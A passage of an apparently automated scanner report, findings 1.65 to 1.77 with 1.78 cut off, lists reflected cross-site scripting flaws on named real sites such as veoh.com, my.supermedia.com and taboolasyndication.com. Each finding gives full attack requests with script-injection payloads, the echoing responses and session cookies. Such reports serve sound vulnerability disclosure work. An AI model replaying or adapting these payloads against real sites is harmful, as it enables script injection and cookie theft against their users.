1.65. http://ll-appserver.veoh.com/styles/veoh-ie6.css [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ll-appserver.veoh.com
Path:   /styles/veoh-ie6.css

Issue detail

The value of the version request parameter is copied into the HTML document as plain text between tags. The payload 714d6<script>alert(1)</script>a1c7f770126 was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/veoh-ie6.css?version=AFrontend.5.5.4.1038714d6<script>alert(1)</script>a1c7f770126 HTTP/1.1
Host: ll-appserver.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.0.10.1296766388;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:30 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sat, 26 Jul 2030 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/css; charset: UTF-8
Connection: close

div.spacer{clear:both;line-height:0px;font-size:0px;height:60px}div.smallSpacer{clear:both;line-height:0px;font-size:0px;height:20px}div.tinySpacer{clear:both;line-height:0px;font-size:0px;height:8px}
...[SNIP]...
kenOut
li{border:0;border-right:1px solid #d7d7d7;background:none}#bodyLevelThumbTip_leftOf
.thumbMeta{background:transparent url(../images/hoverdetails_bg_shadow_right.png?version=AFrontend.5.5.4.1038714d6<script>alert(1)</script>a1c7f770126) no-repeat scroll center bottom}#veohPage, #contentHolder_watchFull #playerBottomOuterWrapper,#commentLoginWrapper{background-color:#fff}#contentHolder_watchFull #watch-controls, div.chooseCat ul li a
...[SNIP]...

1.66. http://ll-appserver.veoh.com/styles/veoh.css [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ll-appserver.veoh.com
Path:   /styles/veoh.css

Issue detail

The value of the version request parameter is copied into the HTML document as plain text between tags. The payload 88ebc<script>alert(1)</script>9e1cf63d45e was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/veoh.css?version=AFrontend.5.5.4.103888ebc<script>alert(1)</script>9e1cf63d45e HTTP/1.1
Host: ll-appserver.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:41:45 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sat, 26 Jul 2030 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/css; charset: UTF-8
Connection: keep-alive
Content-Length: 98344

*{margin:0;padding:0}body{font:normal 12px "Lucida Grande", Tahoma, Arial, Helvetica, sans-serif;text-align:center;margin:0
auto;position:relative}.clear{clear:both;line-height:0px;font-size:0px}.clea
...[SNIP]...
:left;width:250px}.recaptcha_icons{margin-top:3px;float:right}.recaptcha_audio{display:block;width:25px;height:16px;background:transparent url(../images/recaptcha_audio.gif?version=AFrontend.5.5.4.103888ebc<script>alert(1)</script>9e1cf63d45e) no-repeat top center}.recaptcha_text{display:block;width:25px;height:16px;background:transparent url(../images/recaptcha_text.gif?version=AFrontend.5.5.4.103888ebc<script>
...[SNIP]...

1.67. http://managedq.com/search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://managedq.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65f22"%3balert(1)//e219070d6eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 65f22";alert(1)//e219070d6eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=o/65f22"%3balert(1)//e219070d6ebbama HTTP/1.1
Host: managedq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13527
Connection: close
Content-Type: text/html


<head>
   <base href="http://managedq.com/">    
<script src="http://www.google.com/jsapi?key=ABQIAAAAfY9R5yZEX7c7fNMc_53H-RSS93VGBhy0VH-F4ConCm_atGP3gxQMWmXfPasKYusJ-dKLng0cAOqm0g" type="text/javascri
...[SNIP]...
r.estimatedResultCount)
//        searcher.cursor.estimatedResultCount
       }

   searchControl.setSearchCompleteCallback(this, OnSearchComplete);
// Execute an inital search
searchControl.execute("o/65f22";alert(1)//e219070d6ebbama");

   //search.gotoPage(3)
//    searchControl.execute("managedq");
}
google.setOnLoadCallback(OnLoad);

//setTimeout("alert(string)",4000)

//]]>
...[SNIP]...

1.68. http://managedq.com/search.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://managedq.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be8e1"%3balert(1)//d33907aeb4e was submitted in the q parameter. This input was echoed as be8e1";alert(1)//d33907aeb4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=obamabe8e1"%3balert(1)//d33907aeb4e HTTP/1.1
Host: managedq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13526
Connection: close
Content-Type: text/html


<head>
   <base href="http://managedq.com/">    
<script src="http://www.google.com/jsapi?key=ABQIAAAAfY9R5yZEX7c7fNMc_53H-RSS93VGBhy0VH-F4ConCm_atGP3gxQMWmXfPasKYusJ-dKLng0cAOqm0g" type="text/javascri
...[SNIP]...
stimatedResultCount)
//        searcher.cursor.estimatedResultCount
       }

   searchControl.setSearchCompleteCallback(this, OnSearchComplete);
// Execute an inital search
searchControl.execute("obamabe8e1";alert(1)//d33907aeb4e");

   //search.gotoPage(3)
//    searchControl.execute("managedq");
}
google.setOnLoadCallback(OnLoad);

//setTimeout("alert(string)",4000)

//]]>
...[SNIP]...

1.69. http://my.supermedia.com/customersupport/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /customersupport/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33517"><script>alert(1)</script>270ee3472e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customersupport/index.jsp?33517"><script>alert(1)</script>270ee3472e7=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:30 GMT
Content-Length: 19431
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:06 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/customersupport/index.jsp?33517"><script>alert(1)</script>270ee3472e7=1&print=ed">
...[SNIP]...

1.70. http://my.supermedia.com/directoryoptout [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37fe3"><script>alert(1)</script>84741f5cfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /directoryoptout?37fe3"><script>alert(1)</script>84741f5cfde=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:26 GMT
Pragma: no-cache
Content-Length: 24725
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NLD6RFdXPRTw2vwG1LgBrG7JnC27kyJ154JBgp4LL03M7ljcGhrz!-1173275059!-550558129; path=/
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:44:01 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3"><script>alert(1)</script>84741f5cfde=1&print=ed">
...[SNIP]...

1.71. http://my.supermedia.com/directoryoptout/ [37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/

Issue detail

The value of the 37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8cf"><script>alert(1)</script>b83041eb0df was submitted in the 37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=11e8cf"><script>alert(1)</script>b83041eb0df HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://burp/show/1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=NLD6ljxjQJDXGQgrK61P3yT1JkXkjgDLb1jBKjgFT6wzymnbnMhk!-550558129!-1173275059; mbox=session#1296759528614-838261#1296763713|check#true#1296761913; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:46:25 GMT
Pragma: no-cache
ntCoent-Length: 24682
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:54:01 GMT;path=/;httponly
Content-Length: 24682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=11e8cf"><script>alert(1)</script>b83041eb0df&print=ed">
...[SNIP]...

1.72. http://my.supermedia.com/directoryoptout/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87e3"><script>alert(1)</script>55222cbb99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1&a87e3"><script>alert(1)</script>55222cbb99d=1 HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://burp/show/1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=NLD6ljxjQJDXGQgrK61P3yT1JkXkjgDLb1jBKjgFT6wzymnbnMhk!-550558129!-1173275059; mbox=session#1296759528614-838261#1296763713|check#true#1296761913; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:03 GMT
Pragma: no-cache
ntCoent-Length: 24688
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:55:39 GMT;path=/;httponly
Content-Length: 24688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1&a87e3"><script>alert(1)</script>55222cbb99d=1&print=ed">
...[SNIP]...

1.73. http://my.supermedia.com/directoryoptout/confirm.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/confirm.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 319e1"><script>alert(1)</script>a37efd293c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/confirm.do?319e1"><script>alert(1)</script>a37efd293c2=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:32 GMT
Pragma: no-cache
Content-Length: 25076
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:08 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?319e1"><script>alert(1)</script>a37efd293c2=1&print=ed">
...[SNIP]...

1.74. http://my.supermedia.com/directoryoptout/index.jsp [37fe3%22%3E%3Cscript%3Ealert(document.cookie parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/index.jsp

Issue detail

The value of the 37fe3%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1233c"><script>alert(1)</script>6337a742d73 was submitted in the 37fe3%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie1233c"><script>alert(1)</script>6337a742d73 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:24 GMT
Pragma: no-cache
Content-Length: 24636
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:55:59 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie1233c"><script>alert(1)</script>6337a742d73&print=ed">
...[SNIP]...

1.75. http://my.supermedia.com/directoryoptout/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb13"><script>alert(1)</script>0d37311fbea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/index.jsp?7cb13"><script>alert(1)</script>0d37311fbea=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:31 GMT
Pragma: no-cache
Content-Length: 24551
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:06 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?7cb13"><script>alert(1)</script>0d37311fbea=1&print=ed">
...[SNIP]...

1.76. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 59864%0aalert(1)//f7b59311292 was submitted in the url parameter. This input was echoed as 59864
alert(1)//f7b59311292
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml59864%0aalert(1)//f7b59311292&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.555.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22DORK+Share%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/ HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 04 Feb 2011 17:57:21 GMT
Expires: Fri, 04 Feb 2011 17:57:21 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 116

Unable to retrieve spec for http://fcgadgets.appspot.com/spec/shareit.xml59864
alert(1)//f7b59311292
. HTTP error 400

1.77. http://trc.taboolasyndication.com/dispatch/ [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload c34fc<script>alert(1)</script>1395c3bee03 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=jsonc34fc<script>alert(1)</script>1395c3bee03&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. selectionMethod=request-parameter, selectionParam=format, defaultSerializer=xml
Date: Thu, 03 Feb 2011 21:44:41 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=a72418f5-7573-4033-a20c-768665ba4c71;Path=/;Expires=Fri, 03-Feb-12 21:44:41 GMT
Set-Cookie: taboola_session_id_veoh=v1_7d4cc60fd932dcc7937c149c3cdf9f52_a72418f5-7573-4033-a20c-768665ba4c71_1296769481_1296769481;Path=/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 21:44:41 GMT
Set-Cookie: taboola_rii_veoh=1039225080754099931_5874168958137325309;Path=/;Expires=Fri, 03-Feb-12 21:44:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 4107

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 serializer id "jsonc34fc&lt;script&gt;alert(1)&lt;/script&gt;1395c3bee03" is not configured. se
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFRequestException: serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. selectionMethod=request-parameter, selectionParam=format, defaultSerializer=xml
   at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.selectSerializer(RecommendationClientAda
...[SNIP]...

1.78. http://trc.taboolasyndication.com/dispatch/ [item-type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
